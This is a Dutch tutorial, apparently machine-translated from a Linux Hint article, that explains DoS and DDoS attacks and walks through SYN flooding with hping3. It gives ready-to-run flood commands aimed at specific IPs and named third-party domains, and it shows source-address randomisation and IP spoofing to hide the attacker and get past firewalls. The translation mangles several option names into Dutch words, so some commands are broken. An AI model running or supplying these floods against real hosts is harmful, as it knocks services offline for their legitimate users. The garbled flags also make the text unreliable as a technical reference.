DOS-aanvallen
Een denial of Service (DOS)-aanval is een zeer eenvoudige techniek om de toegang tot services te weigeren (daarom wordt het een "denial of service"-aanval genoemd). Deze aanval bestaat uit het overladen van het doelwit met te grote pakketten, of een grote hoeveelheid ervan quantity.
Hoewel deze aanval heel gemakkelijk uit te voeren is, brengt het de informatie of privacy van het doelwit niet in gevaar, het is geen penetrerende aanval en is alleen bedoeld om toegang tot het doelwit te voorkomen.
Door een hoeveelheid pakketten te verzenden, kan het doelwit aanvallers niet aan, voorkomen dat de server legitieme gebruikers bedient.
DOS-aanvallen worden uitgevoerd vanaf een enkel apparaat, daarom is het gemakkelijk om ze te stoppen door het IP-adres van de aanvaller te blokkeren, maar de aanvaller kan het IP-adres van het doel wijzigen en zelfs vervalsen (klonen), maar het is niet moeilijk voor firewalls om met dergelijke aanvallen om te gaan , in tegenstelling tot wat er gebeurt met DDOS-aanvallen.
DDOS-aanvallen
Een Distributed Denial of Service-aanval (DDOS) is vergelijkbaar met een DOS-aanval, maar wordt tegelijkertijd vanaf verschillende knooppunten (of verschillende aanvallers) uitgevoerd. Gewoonlijk worden DDOS-aanvallen uitgevoerd door botnets. Botnets zijn geautomatiseerde scripts of programma's die computers infecteren om een geautomatiseerde taak uit te voeren (in dit geval een DDOS-aanval). Een hacker kan een botnet maken en veel computers infecteren van waaruit botnets DOS-aanvallen lanceren. Het feit dat veel botnets tegelijkertijd schieten, verandert de DOS-aanval in een DDOS-aanval (daarom wordt het 'gedistribueerd' genoemd).
Natuurlijk zijn er uitzonderingen waarbij DDOS-aanvallen werden uitgevoerd door echte menselijke aanvallers, bijvoorbeeld de hackersgroep Anonymous, geïntegreerd door duizenden mensen over de hele wereld, gebruikte deze techniek heel vaak vanwege de eenvoudige implementatie (er waren alleen vrijwilligers nodig die hun zaak deelden), dat is bijvoorbeeld hoe Anonymous de Libische regering van Kadhafi volledig losliet tijdens de invasie, de Libische staat weerloos werd achtergelaten voor duizenden aanvallers van over de hele wereld.
Dit type aanvallen, wanneer uitgevoerd vanaf veel verschillende knooppunten, is uiterst moeilijk te voorkomen en te stoppen en vereist normaal gesproken speciale hardware om mee om te gaan, dit komt omdat firewalls en defensieve applicaties niet voorbereid zijn om duizenden aanvallers tegelijk aan te pakken. Dit is niet het geval bij hping3, de meeste aanvallen die via deze tool worden uitgevoerd, worden geblokkeerd door defensieve apparaten of software, maar het is nuttig in lokale netwerken of tegen slecht beveiligde doelen.
Over hping3
Met de tool hping3 kun je gemanipuleerde pakketten verzenden. Met deze tool kunt u de grootte, hoeveelheid en fragmentatie van pakketten regelen om het doel te overbelasten en firewalls te omzeilen of aan te vallen. HPing3 kan handig zijn voor beveiligings- of capaciteitstestdoeleinden, hiermee kunt u de effectiviteit van firewalls testen en of een server een groot aantal pakketten aankan. Hieronder vindt u instructies voor het gebruik van hping3 voor beveiligingstestdoeleinden.
Aan de slag met DDOS-aanvallen met hping3:
Op Debian en gebaseerde Linux-distributies kunt u hping3 installeren door het volgende uit te voeren:
# apt installeer hping3 -y
Een simpele DOS (niet DDOS) aanval zou zijn:
# sudo hping3 -S --flood -V -p 80 170.155.9.185
Waar:
sudo: geeft de benodigde rechten om hping3 uit te voeren.
hping3: roept hping3-programma aan.
-S: specificeert SYN-pakketten.
-overstroming: schiet naar eigen goeddunken, antwoorden worden genegeerd (daarom worden antwoorden niet getoond) en pakketten worden zo snel mogelijk verzonden.
-V: Breedsprakigheid.
-blz. 80: poort 80, kunt u dit nummer vervangen door de service die u wilt aanvallen.
170.155.9.185: doel-IP.
Flood met behulp van SYN-pakketten tegen poort 80:
Het volgende voorbeeld toont een SYN-aanval tegen lacampora.organisatie:
# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-sourceWaar:
Lacampora.organisatie: is het doelwit
-vraag: korte output
-nt: toon doel-IP in plaats van host.
-d120: pakketgrootte instellen
-rand-bron: IP-adres verbergen.
Het volgende voorbeeld toont een ander mogelijk voorbeeld van een overstroming:
SYN overstroming tegen poort 80:
# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood
Met hping3 kun je je doelen ook aanvallen met een nep-IP, om een firewall te omzeilen kun je zelfs je doel-IP zelf klonen, of elk toegestaan adres dat je kent (je kunt het bijvoorbeeld bereiken met Nmap of een sniffer om te luisteren vastgesteld verbindingen).
De syntaxis zou zijn:
# sudo hping3 -aIn dit praktische voorbeeld lijkt de aanval:
# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --sneller -c2
Ik hoop dat je deze tutorial over hping3 nuttig vond. Blijf Linux volgen Hint voor meer tips en updates over Linux en netwerken.